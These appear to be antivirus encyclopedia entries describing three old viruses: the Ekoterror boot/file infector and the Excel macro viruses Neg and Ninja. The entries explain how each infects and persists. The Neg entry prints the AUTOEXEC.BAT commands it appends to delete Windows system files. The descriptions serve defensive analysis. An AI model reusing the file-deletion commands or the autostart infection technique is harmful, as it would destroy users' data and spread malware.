Ekoterror
Description Ekoterror
It is a dangerous memory-resident multipartite stealth virus. When an infected file is executed, it writes itself to the MBR of the hard drive (it occupies sectors 0/0/1 through 0/0/5, track/head/sector) and returns control to the host program. When the system is loaded from the infected sector, it hooks INT 8 and INT 13h, then uses INT 8 to hook INT 21h, and writes itself to the beginning of .COM files as they are created. Sometimes it decrypts and displays the message:
EkoTerror (C) 1991 ATK-toimisto P.Linkola Oy Kovalevysi on poistettu käytöstä luonnonsuojelun nimessä. Vihreässä yhteiskunnassa ei saa olla ydinsähköllä toimivia kovalevyjä.
and then hangs the computer. It infects some types of hard drives incorrectly; in these cases DOS hangs on loading.
Macro.Excel.Neg
Description Macro.Excel.Neg
This virus infects Excel sheets. It contains six functions in one module, Dollar: Auto_Open, Fuck, Auto_Close, cek_global, infectglobal, and inFuckIt. When an infected document is loaded, Excel executes the auto macro auto_open, and the virus takes control. The virus auto_open macro contains a command that defines the Fuck macro as a handler of the OnSheetActivate routine. As a result, the virus hooks the sheet activation routine, and takes control whenever a sheet is opened. When the auto_open macro takes control, it searches for DOLLAR.XLM files in the Excel Startup directory. If the infected macro is an active Workbook and the DOLLAR.XLM file does not exist in the Excel Startup directory when the virus is executed for the first time, the virus creates this file and saves its code to it by using the SaveAs command. The next time Excel loads its modules, it automatically loads all XLS files from the Startup directory. The infected DOLLAR.XLM is loaded along with the other files, and the virus takes control and hooks the sheet activation routine. Upon activation of a sheet, the virus copies its code to the active Workbook and, as a result, spreads its code to this sheet. The virus deletes 25 menu items related to macro viewing, editing, etc., if they exist. On the 13th of any month, it appends to the C:\AUTOEXEC.BAT file commands that erase Windows files:
    @ECHO OFF
    CLS
    cd\windows
    del *.com >nul
    del *.vxd >nul
    del *.drv >nul
    del *.dll >nul
The virus contains the comments:
    ------------------------------------------------
    Generated with NEG !!. Please include this text
    ------------------------------------------------
    NEG is Trademark of NoMercy
    Date generated : 27- 3- 1998
    VirusName: Dollar
    Author: NEG
    Module Name: Dollar
    Template: DOLLAR.XLM
Macro.Excel.Ninja
Description Macro.Excel.Ninja
This virus infects Excel spreadsheets (XLS files). It contains one module, "Ninja," that has two functions: "auto_open" and "Infect_Ninja". The virus "auto_open" macro contains just one command, which defines the "Infect_Ninja" macro as a handler of the OnSheetActivate routine. As a result, the virus hooks sheet activation, and whenever a sheet is opened, the virus (the Infect_Ninja macro) takes control. When the Infect_Ninja macro takes control, it searches for NINJA.XLS files in the Excel Startup directory and checks the count of modules in the current Workbook. If the infected macro is an active Workbook and the NINJA.XLS file does not exist in the Excel Startup directory, the virus decides that it is being executed for the first time. The virus then creates the NINJA.XLS file in the Excel Startup directory and saves its code to it by using the "Save As" command. The next time Excel loads its modules, it automatically loads all XLS files from the Startup directory. The infected NINJA.XLS is loaded along with the other files, and the virus takes control and hooks the sheet activation routine. If the NINJA.XLS file exists in the Excel directory, the virus copies its code to the active Workbook. As a result, the active Workbook is infected.